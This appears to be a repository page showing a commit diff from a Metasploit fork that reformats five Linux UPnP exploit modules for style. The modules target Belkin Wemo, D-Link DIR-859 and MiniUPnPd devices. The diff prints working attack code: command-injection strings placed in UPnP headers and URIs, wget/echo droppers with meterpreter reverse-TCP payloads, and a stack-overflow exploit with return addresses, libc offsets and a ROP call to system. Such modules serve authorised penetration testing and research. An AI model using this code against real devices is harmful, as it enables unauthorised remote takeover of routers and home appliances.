adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge pull request #20203 from bcoles/rubocop-modules-exploits-linux-upnp

Browse Source 
modules/exploits/linux/upnp: Resolve RuboCop violations
This commit is contained in:
jheysel-r7
2025-05-20 10:46:46 -07:00
committed by GitHub
parent 85de0bca16 d567248b16
commit dd3093c806
5 changed files with 243 additions and 222 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb
+72 -63
View File
@@ -12,60 +12,69 @@ class MetasploitModule < Msf::Exploit::Remote
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(update_info(info,
'Name' => 'Belkin Wemo UPnP Remote Code Execution',
'Description' => %q{
This module exploits a command injection in the Belkin Wemo UPnP API via
the SmartDevURL argument to the SetSmartDevInfo action.
super(
update_info(
info,
'Name' => 'Belkin Wemo UPnP Remote Code Execution',
'Description' => %q{
This module exploits a command injection in the Belkin Wemo UPnP API via
the SmartDevURL argument to the SetSmartDevInfo action.
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different RPORT (49153).
},
'Author' => [
'phikshun', # Discovery, UFuzz, and modules
'wvu', # Crock-Pot testing and module
'nstarke' # Version-checking research and implementation
],
'References' => [
['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
['URL', 'https://github.com/phikshun/ufuzz'],
['URL', 'https://gist.github.com/phikshun/10900566'],
['URL', 'https://gist.github.com/phikshun/9984624'],
['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'],
['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
['URL', 'http://www.wemo.com/']
],
'DisclosureDate' => '2014-04-04',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_MIPSLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic'
}
This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different RPORT (49153).
},
'Author' => [
'phikshun', # Discovery, UFuzz, and modules
'wvu', # Crock-Pot testing and module
'nstarke' # Version-checking research and implementation
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
}
))
'References' => [
['URL', 'https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/'],
['URL', 'https://github.com/phikshun/ufuzz'],
['URL', 'https://gist.github.com/phikshun/10900566'],
['URL', 'https://gist.github.com/phikshun/9984624'],
['URL', 'http://web.archive.org/web/20180301171809/https://www.crock-pot.com/wemo-landing-page.html'],
['URL', 'https://www.belkin.com/us/support-article?articleNum=101177'],
['URL', 'http://www.wemo.com/']
],
'DisclosureDate' => '2014-04-04',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_MIPSLE],
'Privileged' => true,
'Targets' => [
[
'Unix In-Memory',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE,
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
}
}
]
],
'DefaultTarget' => 1,
'Notes' => {
'NOCVE' => ['Patched in 2.00.8643 without vendor disclosure'],
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options([
Opt::RPORT(49152)
@@ -81,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi(
'method' => 'GET',
'uri' => '/setup.xml'
'uri' => '/setup.xml'
)
unless res && res.code == 200 && res.body.include?('urn:Belkin:device:')
@@ -93,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
checkcode = CheckCode::Detected
version = (v = res.get_xml_document.at('firmwareVersion')&.text) &&
v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && $1 && Rex::Version.new($1)
v =~ /WeMo_WW_(\d+(?:\.\d+)+)/ && ::Regexp.last_match(1) && Rex::Version.new(::Regexp.last_match(1))
unless version
vprint_error('Could not determine firmware version')
@@ -120,9 +129,9 @@ class MetasploitModule < Msf::Exploit::Remote
execute_command(payload.encoded)
when :linux_dropper
cmdstager = generate_cmdstager(
flavor: :wget,
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path),
flavor: :wget,
temp: datastore['WritableDir'],
file: File.basename(cmdstager_path),
noconcat: true
)
@@ -136,15 +145,15 @@ class MetasploitModule < Msf::Exploit::Remote
end
end
def execute_command(cmd, opts = {})
def execute_command(cmd, _opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => '/upnp/control/basicevent1',
'ctype' => 'text/xml',
'headers' => {
'method' => 'POST',
'uri' => '/upnp/control/basicevent1',
'ctype' => 'text/xml',
'headers' => {
'SOAPACTION' => '"urn:Belkin:service:basicevent:1#SetSmartDevInfo"'
},
'data' => generate_soap_xml(cmd)
'data' => generate_soap_xml(cmd)
)
end
modules/exploits/linux/upnp/dlink_dir859_exec_ssdpcgi.rb
+39 -34
View File
@@ -13,63 +13,68 @@ class MetasploitModule < Msf::Exploit::Remote
deprecated(Date.new(2024, 12, 1), 'Use `exploit/linux/upnp/dlink_upnp_msearch_exec` instead')
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
'Author' => [
's1kr10s',
'secenv'
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
['CVE', '2019-20215'],
['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
],
'DisclosureDate' => '2019-12-24',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
'DisclosureDate' => '2019-12-24',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '1900'
},
'Targets' =>
[
[ 'Auto', { } ],
'Targets' => [
[ 'Auto', {} ],
],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget' => 0
))
'CmdStagerFlavor' => %w[echo wget],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
register_options(
[
Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
])
register_options(
[
Msf::OptEnum.new('VECTOR', [true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
]
)
end
def exploit
execute_cmdstager(linemax: 1500)
end
def execute_command(cmd, opts)
def execute_command(cmd, _opts)
type = datastore['VECTOR']
if type == "URN"
print_status("Target Payload URN")
if type == 'URN'
print_status('Target Payload URN')
val = "urn:device:1;`#{cmd}`"
else
print_status("Target Payload UUID")
print_status('Target Payload UUID')
val = "uuid:`#{cmd}`"
end
connect_udp
header = "M-SEARCH * HTTP/1.1\r\n"
header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
header << "Host:239.255.255.250: #{datastore['RPORT']}\r\n"
header << "ST:#{val}\r\n"
header << "Man:\"ssdp:discover\"\r\n"
header << "MX:2\r\n\r\n"
modules/exploits/linux/upnp/dlink_dir859_subscribe_exec.rb
+47 -46
View File
@@ -10,62 +10,63 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
'Description' => %q{
D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
/htdocs/cgibin), which is accessible without credentials.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
'Description' => %q{
D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
/htdocs/cgibin), which is accessible without credentials.
},
'Author' => [
'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2019-17621' ],
[ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
],
'DisclosureDate' => '2019-12-24',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '49152'
'DisclosureDate' => '2019-12-24',
'Privileged' => true,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
'CMDSTAGER::FLAVOR' => 'wget',
'RPORT' => '49152'
},
'Targets' =>
[
[ 'Automatic', { } ],
'Targets' => [
[ 'Automatic', {} ],
],
'CmdStagerFlavor' => %w{ echo wget },
'DefaultTarget' => 0,
))
'CmdStagerFlavor' => %w[echo wget],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK],
'Reliability' => [REPEATABLE_SESSION]
}
)
)
end
def execute_command(cmd, opts)
callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +
":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +
"/" + Rex::Text.rand_text_alpha(3..12)
begin
send_request_raw({
'uri' => "/gena.cgi?service=`#{cmd}`",
'method' => 'SUBSCRIBE',
'headers' =>
{
'Callback' => "<#{callback_uri}>",
'NT' => 'upnp:event',
'Timeout' => 'Second-1800',
},
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
end
def execute_command(cmd, _opts)
callback_uri = 'http://192.168.0.' + Rex::Text.rand_text_hex(2).to_i(16).to_s +
':' + Rex::Text.rand_text_hex(4).to_i(16).to_s +
'/' + Rex::Text.rand_text_alpha(3..12)
send_request_raw({
'uri' => "/gena.cgi?service=`#{cmd}`",
'method' => 'SUBSCRIBE',
'headers' =>
{
'Callback' => "<#{callback_uri}>",
'NT' => 'upnp:event',
'Timeout' => 'Second-1800'
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
end
def exploit
modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
+1 -1
View File
@@ -337,7 +337,7 @@ class MetasploitModule < Msf::Exploit::Remote
connect_udp
header = "M-SEARCH * HTTP/1.1\r\n"
header << 'HOST:' + datastore['RHOST'].to_s + ':' + datastore['RPORT'].to_s + "\r\n"
header << "HOST:#{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
header << "ST:#{payload}\r\n"
header << "MX:2\r\n"
header << "MAN:\"ssdp:discover\"\r\n\r\n"
modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
+84 -78
View File
@@ -10,45 +10,44 @@ class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
'Description' => %q{
super(
update_info(
info,
'Name' => 'MiniUPnPd 1.0 Stack Buffer Overflow Remote Code Execution',
'Description' => %q{
This module exploits the MiniUPnP 1.0 SOAP stack buffer overflow vulnerability
present in the SOAPAction HTTP header handling.
},
'Author' =>
[
present in the SOAPAction HTTP header handling.
},
'Author' => [
'hdm', # Vulnerability discovery
'Dejan Lukan', # Metasploit module, debian target
'Onur ALANBEL', # Expliot for Airties target
'Onur ALANBEL', # Exploit for Airties target
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module, Airties target
],
'License' => MSF_LICENSE,
'DefaultOptions' => { 'EXITFUNC' => 'process', },
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_MIPSBE],
'References' =>
[
'License' => MSF_LICENSE,
'DefaultOptions' => { 'EXITFUNC' => 'process' },
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_MIPSBE],
'References' => [
[ 'CVE', '2013-0230' ],
[ 'OSVDB', '89624' ],
[ 'BID', '57608' ],
[ 'URL', 'https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
],
'Payload' =>
{
'Payload' => {
'DisableNops' => true
},
'Targets' =>
[
[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
'Targets' => [
[
'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
{
'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
'Offset' => 2123,
'Arch' => ARCH_X86,
'Arch' => ARCH_X86,
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
# of the program is never reached)
'Payload' =>
'Payload' =>
{
'Space' => 2060,
'BadChars' => "\x00\x22"
@@ -56,22 +55,29 @@ class MetasploitModule < Msf::Exploit::Remote
:callback => :target_debian
}
],
[ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',
[
'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',
{
'Offset' => 2048,
'LibcBase' => 0x2aabd000,
'System' => 0x00031AC0,
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
'Offset' => 2048,
'LibcBase' => 0x2aabd000,
'System' => 0x00031AC0,
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
'Fingerprint' => 'AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0',
'Arch' => ARCH_MIPSBE,
:callback => :target_airties
'Arch' => ARCH_MIPSBE,
:callback => :target_airties
}
]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => '2013-03-27',
))
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => '2013-03-27',
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [ARTIFACTS_ON_DISK],
'Reliability' => []
}
)
)
register_options([
Opt::RPORT(5555),
@@ -83,8 +89,8 @@ class MetasploitModule < Msf::Exploit::Remote
def check
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/'
'method' => 'POST',
'uri' => '/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
@@ -102,11 +108,11 @@ class MetasploitModule < Msf::Exploit::Remote
end
def exploit
unless self.respond_to?(target[:callback])
unless respond_to?(target[:callback])
fail_with(Failure::BadConfig, 'Invalid target specified: no callback function defined')
end
self.send(target[:callback])
send(target[:callback])
end
def target_debian
@@ -114,10 +120,10 @@ class MetasploitModule < Msf::Exploit::Remote
# Build the SOAP Exploit
#
# jmp 0x2d ; jump forward 0x2d bytes (jump right after the '#' char)
sploit = "\xeb\x2d"
sploit = "\xeb\x2d"
# a valid action
sploit += "n:schemas-upnp-org:service:WANIPConnection:1#"
sploit += 'n:schemas-upnp-org:service:WANIPConnection:1#'
# payload
sploit += payload.encoded
@@ -126,10 +132,10 @@ class MetasploitModule < Msf::Exploit::Remote
sploit += rand_text(target['Offset'] - sploit.length - 16)
# overwrite registers on stack: the values are not used, so we can overwrite them with anything
sploit += rand_text(4) # overwrite EBX
sploit += rand_text(4) # overwrite ESI
sploit += rand_text(4) # overwrite EDI
sploit += rand_text(4) # overwrite EBP
sploit += rand_text(4) # overwrite EBX
sploit += rand_text(4) # overwrite ESI
sploit += rand_text(4) # overwrite EDI
sploit += rand_text(4) # overwrite EBP
# Overwrite EIP with addresss of "pop ebp, ret", because the second value on the
# stack points directly to the string after 'Soapaction: ', which is why we must
@@ -139,20 +145,20 @@ class MetasploitModule < Msf::Exploit::Remote
sploit += [target.ret].pack('V')
# the ending " character is necessary for the vulnerability to be reached
sploit += "\""
sploit += '"'
# data sent in the POST body
data =
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
"<SOAP-ENV:Envelope\r\n" +
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
">\r\n" +
"<SOAP-ENV:Body>\r\n" +
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
"</ns1:action>\r\n" +
"</SOAP-ENV:Body>\r\n" +
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" \
"<SOAP-ENV:Envelope\r\n" \
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" \
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" \
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" \
">\r\n" \
"<SOAP-ENV:Body>\r\n" \
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" \
"</ns1:action>\r\n" \
"</SOAP-ENV:Body>\r\n" \
"</SOAP-ENV:Envelope>\r\n"
#
@@ -160,12 +166,12 @@ class MetasploitModule < Msf::Exploit::Remote
#
print_status("Sending exploit to victim #{target.name}...")
send_request_cgi({
'method' => 'POST',
'uri' => "/",
'method' => 'POST',
'uri' => '/',
'headers' => {
'SOAPAction' => sploit,
'SOAPAction' => sploit
},
'data' => data,
'data' => data
})
# disconnect from the server
@@ -175,48 +181,48 @@ class MetasploitModule < Msf::Exploit::Remote
def target_airties
print_status("Sending exploit to victim #{target.name}...")
execute_cmdstager(
:flavor => :echo
flavor: :echo
)
end
def execute_command(cmd, opts)
def execute_command(cmd, _opts)
# Build the SOAP Exploit
# a valid action
sploit = "n:schemas-upnp-org:service:WANIPConnection:1#"
sploit = 'n:schemas-upnp-org:service:WANIPConnection:1#'
sploit << rand_text_alpha_upper(target['Offset'])
sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system
sploit << [target['LibcBase'] + target['System']].pack('N') # s0 - address of system
sploit << rand_text_alpha_upper(24) # $s1 - $s6
sploit << [target['LibcBase'] + target['CallSystem']].pack("N")
sploit << [target['LibcBase'] + target['CallSystem']].pack('N')
# 0001CC94 addiu $a0, $sp, 0x18
# 0001CC98 move $t9, $s0
# 0001CC9C jalr $t9
# 0001CCA0 li $a1, 1
sploit << rand_text_alpha_upper(24) #filler
sploit << rand_text_alpha_upper(24) # filler
sploit << cmd
# data sent in the POST body
data =
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
"<SOAP-ENV:Envelope\r\n" +
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
">\r\n" +
"<SOAP-ENV:Body>\r\n" +
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
"</ns1:action>\r\n" +
"</SOAP-ENV:Body>\r\n" +
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" \
"<SOAP-ENV:Envelope\r\n" \
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" \
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" \
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" \
">\r\n" \
"<SOAP-ENV:Body>\r\n" \
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" \
"</ns1:action>\r\n" \
"</SOAP-ENV:Body>\r\n" \
"</SOAP-ENV:Envelope>\r\n"
send_request_cgi({
'method' => 'POST',
'uri' => '/',
'method' => 'POST',
'uri' => '/',
'headers' =>
{
'SOAPAction' => sploit,
'SOAPAction' => sploit
},
'data' => data
'data' => data
})
end
end